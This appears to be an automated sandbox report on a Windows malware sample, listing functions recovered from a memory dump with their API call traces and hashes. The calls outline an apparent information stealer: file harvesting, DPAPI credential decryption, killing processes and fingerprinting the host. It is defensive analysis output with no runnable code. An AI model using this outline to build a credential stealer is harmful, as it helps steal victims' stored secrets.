Opcode ID: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction ID: 4ce6f123533e06b2bb16a968f6f3d400f319701f9bcae6d4057d3e0e57f67cb0
Opcode Fuzzy Hash: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction Fuzzy Hash: 2F027070A00625ABDB11EF74DC4CAAEBBB6EF08709F14541AFC05A7252DBB4D901DFA1

Function 02476627 Relevance: 48.2, APIs: 32, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02476680
GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02476699
GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024766B1
GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024766C9
GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024766E2
GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024766FA
GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02476712
GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0247672B
GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02476743
GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0247675B
GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02476774
GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0247678C
GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024767A4
GetProcAddress.KERNEL32(006390E0,00638D98), ref: 024767BD
GetProcAddress.KERNEL32(006390E0,00638A24), ref: 024767D5
GetProcAddress.KERNEL32(006390E0,00638C18), ref: 024767ED
GetProcAddress.KERNEL32(006390E0,00638E34), ref: 02476806
GetProcAddress.KERNEL32(006390E0,006388BC), ref: 0247681E
GetProcAddress.KERNEL32(006390E0,0063892C), ref: 02476836
GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 0247684F
LoadLibraryA.KERNEL32(00638D50,?,?,?,02471E4A), ref: 02476860
LoadLibraryA.KERNEL32(0063897C,?,?,?,02471E4A), ref: 02476872
LoadLibraryA.KERNEL32(00638904,?,?,?,02471E4A), ref: 02476884
LoadLibraryA.KERNEL32(006389DC,?,?,?,02471E4A), ref: 02476895
LoadLibraryA.KERNEL32(00638B28,?,?,?,02471E4A), ref: 024768A7
GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 024768C4
GetProcAddress.KERNEL32(00639020,00638C24), ref: 024768E0
GetProcAddress.KERNEL32(00639020,006389CC), ref: 024768F8
GetProcAddress.KERNEL32(00639114,00638B94), ref: 02476914
GetProcAddress.KERNEL32(00638FD4,00638928), ref: 02476930
GetProcAddress.KERNEL32(00639004,00638C14), ref: 0247694C
GetProcAddress.KERNEL32(00639004,00435864), ref: 02476963

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction ID: 1c68e1f59c36918c62797c6c208899f177899098738fd68bcde994ca2d84990e
Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction Fuzzy Hash: 67A16EB9A117009FD758DF65EE88A6637BBF789344300A51EF95683360DBB4A900DFB0

Function 0246CF47 Relevance: 40.8, APIs: 27, Instructions: 310filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0246CF63
FindFirstFileA.KERNEL32(?,?), ref: 0246CF7A
lstrcat.KERNEL32(?,?), ref: 0246CFC6
StrCmpCA.SHLWAPI(?,00431D70), ref: 0246CFD8
StrCmpCA.SHLWAPI(?,00431D74), ref: 0246CFF2
wsprintfA.USER32 ref: 0246D017
PathMatchSpecA.SHLWAPI(?,00638D64), ref: 0246D049
CoInitialize.OLE32(00000000), ref: 0246D055

Part of subcall function 0246CE47: CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0246CE6D
Part of subcall function 0246CE47: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0246CEAD
Part of subcall function 0246CE47: lstrcpyn.KERNEL32(?,?,00000104), ref: 0246CF30

CoUninitialize.COMBASE ref: 0246D070
lstrcat.KERNEL32(?,?), ref: 0246D095
lstrlen.KERNEL32(?), ref: 0246D0A2
StrCmpCA.SHLWAPI(?,0042D01C), ref: 0246D0BC
wsprintfA.USER32 ref: 0246D0E4
wsprintfA.USER32 ref: 0246D103
PathMatchSpecA.SHLWAPI(?,?), ref: 0246D117
wsprintfA.USER32 ref: 0246D13F
CopyFileA.KERNEL32(?,?,00000001), ref: 0246D158
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0246D177
GetFileSizeEx.KERNEL32(00000000,?), ref: 0246D18F
CloseHandle.KERNEL32(00000000), ref: 0246D19A
CloseHandle.KERNEL32(00000000), ref: 0246D1A6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0246D1BB
lstrcpy.KERNEL32(00000000,?), ref: 0246D1FB
FindNextFileA.KERNEL32(?,?), ref: 0246D2F4
FindClose.KERNEL32(?), ref: 0246D306

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
String ID:
API String ID: 3860919712-0
Opcode ID: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
Instruction ID: 0e576d8551e0bf62eecb39f77bb6336fd8ecdfd7fadd6ab4720abfcd1cb5d4c4
Opcode Fuzzy Hash: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
Instruction Fuzzy Hash: 9AC17371A00219DFDB54DF64DC48FEE77BAAF48304F04459AF909A7290DB749A84CFA1

Function 0246E597 Relevance: 30.2, APIs: 20, Instructions: 213stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0246E5BA
FindFirstFileA.KERNEL32(?,?), ref: 0246E5D0
StrCmpCA.SHLWAPI(?,00431D70), ref: 0246E5EF
StrCmpCA.SHLWAPI(?,00431D74), ref: 0246E607
wsprintfA.USER32 ref: 0246E62E
StrCmpCA.SHLWAPI(?,0042D01C), ref: 0246E643
wsprintfA.USER32 ref: 0246E65F

Part of subcall function 0246F197: lstrcpy.KERNEL32(00000000,?), ref: 0246F1C9

wsprintfA.USER32 ref: 0246E67D
PathMatchSpecA.SHLWAPI(?,?), ref: 0246E692
lstrcat.KERNEL32(?,00638D24), ref: 0246E6C7
lstrcat.KERNEL32(?,00431D64), ref: 0246E6DA
lstrcat.KERNEL32(?,?), ref: 0246E6EF
lstrcat.KERNEL32(?,00431D64), ref: 0246E702
lstrcat.KERNEL32(?,?), ref: 0246E718
CopyFileA.KERNEL32(?,?,00000001), ref: 0246E72D
lstrcpy.KERNEL32(00000000,?), ref: 0246E766
lstrcpy.KERNEL32(00000000,?), ref: 0246E7BA
DeleteFileA.KERNEL32(?), ref: 0246E7FB

Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 0245169E
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516C0
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516E2
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 02451746

FindNextFileA.KERNEL32(00000000,?), ref: 0246E840
FindClose.KERNEL32(00000000), ref: 0246E84F

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID:
API String ID: 1375681507-0
Opcode ID: 36bb2b642a6ec7b9687f7d675ca182e1ab4e96910ee8a02e493054bd41e1bc67
Instruction ID: 5d47bef0f29b34d33f630173b09f3c40050087205223174d008a74dce3f8373a
Opcode Fuzzy Hash: 36bb2b642a6ec7b9687f7d675ca182e1ab4e96910ee8a02e493054bd41e1bc67
Instruction Fuzzy Hash: 8F815FB16047459BD720EF74DC48EEB77EAAF88704F00891EF98987251EB74D508CBA2

Function 02451820 Relevance: 25.7, APIs: 17, Instructions: 219stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02451849
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02451880
lstrcpy.KERNEL32(00000000,00000000), ref: 024518D3
lstrcat.KERNEL32(00000000), ref: 024518DD
lstrcpy.KERNEL32(00000000,00000000), ref: 02451909
lstrcpy.KERNEL32(00000000,?), ref: 02451A5A
lstrcat.KERNEL32(00000000,00000000), ref: 02451A65

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat
String ID:
API String ID: 2276651480-0
Opcode ID: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction ID: d60e0d7e770a426b0f8ffd02f3937a2e1b689d69952ddc97fee11363eab39b03
Opcode Fuzzy Hash: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction Fuzzy Hash: 158130719006799BCB21EF65CC84BAE7BB6AF44308F04012BEC49A7252DB74DD41DFA0

Function 0246E0B7 Relevance: 24.2, APIs: 16, Instructions: 170stringfilememoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0246E0CF
RtlAllocateHeap.NTDLL(00000000), ref: 0246E0D6
wsprintfA.USER32 ref: 0246E0EE
FindFirstFileA.KERNEL32(?,?), ref: 0246E107
StrCmpCA.SHLWAPI(?,00431D70), ref: 0246E125
StrCmpCA.SHLWAPI(?,00431D74), ref: 0246E140
wsprintfA.USER32 ref: 0246E160
DeleteFileA.KERNEL32(?), ref: 0246E1B4
CopyFileA.KERNEL32(?,?,00000001), ref: 0246E17B

Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 0245169E
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516C0
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516E2
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 02451746

Part of subcall function 0246DD07: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0246DD62
Part of subcall function 0246DD07: lstrcpy.KERNEL32(00000000,?), ref: 0246DD95
Part of subcall function 0246DD07: lstrcat.KERNEL32(?,00000000), ref: 0246DDA3
Part of subcall function 0246DD07: lstrcat.KERNEL32(?,00638B0C), ref: 0246DDBD
Part of subcall function 0246DD07: lstrcat.KERNEL32(?,?), ref: 0246DDD1
Part of subcall function 0246DD07: lstrcat.KERNEL32(?,00638DD8), ref: 0246DDE5
Part of subcall function 0246DD07: lstrcpy.KERNEL32(00000000,?), ref: 0246DE15
Part of subcall function 0246DD07: GetFileAttributesA.KERNEL32(00000000), ref: 0246DE1C

FindNextFileA.KERNEL32(00000000,?), ref: 0246E1C3
FindClose.KERNEL32(00000000), ref: 0246E1D2
lstrcat.KERNEL32(?,00638D24), ref: 0246E1F9
lstrcat.KERNEL32(?,00638A2C), ref: 0246E20B
lstrlen.KERNEL32(?), ref: 0246E216
lstrlen.KERNEL32(?), ref: 0246E225
lstrcpy.KERNEL32(00000000,?), ref: 0246E25B

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
String ID:
API String ID: 3181694991-0
Opcode ID: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
Instruction ID: 05688caf178475ab2d354d16137d9a86f9d9b3b592fb0ea709b81549a7f15156
Opcode Fuzzy Hash: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
Instruction Fuzzy Hash: 32514C716043449FC724EF75DC48AEA77EAAF88315F00492EF99987291EB74D508CF92

Function 0246D8A7 Relevance: 21.2, APIs: 14, Instructions: 183stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0246D8C4
FindFirstFileA.KERNEL32(?,?), ref: 0246D8DB
StrCmpCA.SHLWAPI(?,00431D70), ref: 0246D8FB
StrCmpCA.SHLWAPI(?,00431D74), ref: 0246D915
lstrcat.KERNEL32(?,00638D24), ref: 0246D95A
lstrcat.KERNEL32(?,00638BF8), ref: 0246D96E
lstrcat.KERNEL32(?,?), ref: 0246D982
lstrcat.KERNEL32(?,?), ref: 0246D993
lstrcat.KERNEL32(?,00431D64), ref: 0246D9A5
lstrcat.KERNEL32(?,?), ref: 0246D9B9
lstrcpy.KERNEL32(00000000,?), ref: 0246D9F9
lstrcpy.KERNEL32(00000000,?), ref: 0246DA49
FindNextFileA.KERNEL32(00000000,?), ref: 0246DAAE
FindClose.KERNEL32(00000000), ref: 0246DABD

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
String ID:
API String ID: 50252434-0
Opcode ID: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
Instruction ID: 41ca738debd683e22c46cbe379f45fcb1de0fc9468209de7b6bd4551a0c6b066
Opcode Fuzzy Hash: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
Instruction Fuzzy Hash: EB616771D002199FCB14EF74DC88AEE77BAAF48304F00459AE949A7251DB74EA44CF90

Function 02474927 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02474940
Process32First.KERNEL32(00000000,00000128), ref: 02474950
Process32Next.KERNEL32(00000000,00000128), ref: 02474962
StrCmpCA.SHLWAPI(?,?), ref: 02474974
OpenProcess.KERNEL32(00000001,00000000,?), ref: 02474989
TerminateProcess.KERNEL32(00000000,00000000), ref: 02474998
CloseHandle.KERNEL32(00000000), ref: 0247499F
Process32Next.KERNEL32(00000000,00000128), ref: 024749AD
CloseHandle.KERNEL32(00000000), ref: 024749B8

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction ID: b56045bde5598c40b5dbf1ae8625b9b2405c16ecc174c1bdf87a73ef7c30b597
Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction Fuzzy Hash: 90018071601214ABE7215B74DC89FFB377DEB88B51F00119DF905A2290EFB499848FB1

Function 02472F67 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02477477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02477495

GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02472FA2
LocalAlloc.KERNEL32(00000040,00000000), ref: 02472FB4
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02472FC1
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02472FF3
LocalFree.KERNEL32(00000000), ref: 024731D1

Strings

/ , xrefs: 02473006

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
Instruction ID: 818ecd1176aeffecd91c957486bd5eb9575348a631fe328516c1b5906c39a63b
Opcode Fuzzy Hash: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
Instruction Fuzzy Hash: AAB10671900204CFD715CF58C948BA6BBB2FB44329F29C1EAD419AB3A5D7769C82DF90

Function 0245EFF7 Relevance: 9.1, APIs: 6, Instructions: 96stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0245F022
lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0245F03D
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0245F045
memcpy.MSVCRT(?,?,?), ref: 0245F0B8
lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0245F0EE
lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0245F110

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
Instruction ID: 74e25f1eb9f06deb1ccf8d159544178ee0c545acb7df705beb1a631ce3693583
Opcode Fuzzy Hash: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
Instruction Fuzzy Hash: B131C675B00229ABDB108B58EC45BEFB779EF44705F04417AFA09E3241DBB49A04CBE5

Function 02474897 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 024748AF
Process32First.KERNEL32(00000000,00000128), ref: 024748BF
Process32Next.KERNEL32(00000000,00000128), ref: 024748D1
StrCmpCA.SHLWAPI(?,00435644), ref: 024748E7
Process32Next.KERNEL32(00000000,00000128), ref: 024748F9
CloseHandle.KERNEL32(00000000), ref: 02474904

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2284531361-0
Opcode ID: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
Instruction ID: 2c3a2eefef7c32e53d861a6f3480a4147de1a833a6b17fd101d604da319a1ed8
Opcode Fuzzy Hash: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
Instruction Fuzzy Hash: 4A016271601228ABD7209B70DC89FEB77BDEF08751F0401DAF908D2150EFB49A948EE1

Function 02472E17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 02472E49
RtlAllocateHeap.NTDLL(00000000), ref: 02472E50
GetTimeZoneInformation.KERNEL32(?), ref: 02472E5F
wsprintfA.USER32 ref: 02472E8A

Strings

wwww, xrefs: 02472E70

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 3317088062-671953474
Opcode ID: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction ID: 8a5fc6b6bd959f134d0d67bb4bdd06af36b574b8f70dba28c9e4068689c3b575
Opcode Fuzzy Hash: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction Fuzzy Hash: DE01F771A04614ABC7188F58DC4ABAAB76AE784720F10432AFD16D73C0D7B419008AE5

Function 02477E31 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02478699
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 024786AE
UnhandledExceptionFilter.KERNEL32(0042C2C0), ref: 024786B9
GetCurrentProcess.KERNEL32(C0000409), ref: 024786D5
TerminateProcess.KERNEL32(00000000), ref: 024786DC

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction ID: 03a4fbd1127714e7c0c928b08ea6a02e2a718e497cd13de64ba571a4e01763b9
Opcode Fuzzy Hash: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction Fuzzy Hash: 4721FEB5900306AFC760DF15F984A49BBB4FB28304F50603EF91887B62EBB069858F5D

Function 024578F7 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 02457905
RtlAllocateHeap.NTDLL(00000000), ref: 0245790C
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02457934
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 02457954
LocalFree.KERNEL32(?), ref: 0245795E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction ID: 23db22f27df1657a4d37a133bd75bf2e100f3e1e9ce8f89d7df06ee8d9bea897
Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction Fuzzy Hash: B5011275B40318BBEB14DB949C4AFAA7779EB44B15F104159FA05EB2C0D6B099008BE4

Function 024742F7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 02474314
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 02474323
RtlAllocateHeap.NTDLL(00000000), ref: 0247432A
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 0247435A

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: 4b7ed4fbed34c5f0020e6f466aade4300e16399d504f1b0032c20f38a457959a
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: 41011A70600205ABDB149FA5EC89BABBBBEEF85315F104559BD0987350EBB1E9408BA0

Function 02459E47 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02459E66
LocalAlloc.KERNEL32(00000040,?), ref: 02459E7A
memcpy.MSVCRT(00000000,?), ref: 02459E91
LocalFree.KERNEL32(?), ref: 02459E9E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: fd66c15fe319b00fbd2e6f6e4d5972c4c5ffa325f222a5320823325f54172214
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: 04011D75A41315AFD7109BA4DC55FAFB779EB44700F104559FE04AB380DBB09A00CBE4

Function 02459DE7 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02459E02
LocalAlloc.KERNEL32(00000040,00000000), ref: 02459E11
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02459E28
LocalFree.KERNEL32 ref: 02459E37

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction ID: 49ea7f2984abcd902c5bb636c427f16aa2612ad75489e6922763db5607f7f9ed
Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction Fuzzy Hash: 30F0BD70344322ABE7705F65AD49F577BA9EB04B51F241415FE49EA2C0E7F49840CAE4

Function 0246CE47 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0246CE6D
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0246CEAD
lstrcpyn.KERNEL32(?,?,00000104), ref: 0246CF30

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWidelstrcpyn
String ID:
API String ID: 1940255200-0
Opcode ID: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction ID: 8b08e8975d134769b0dd35901ab83b94220c79f761a110b479e496fe5e17d47e
Opcode Fuzzy Hash: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction Fuzzy Hash: 22318E71A00215BFD714DB98CC85FAAB7B9AB88B00F104185FA04EB2D0D7B0AE45CBE1

Function 024733F7 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 02473426
wsprintfA.USER32 ref: 0247343C

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
Instruction ID: f65817de7e7fd47d44b17b8021c7cd67f375be54b6912325e0058823345b8027
Opcode Fuzzy Hash: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
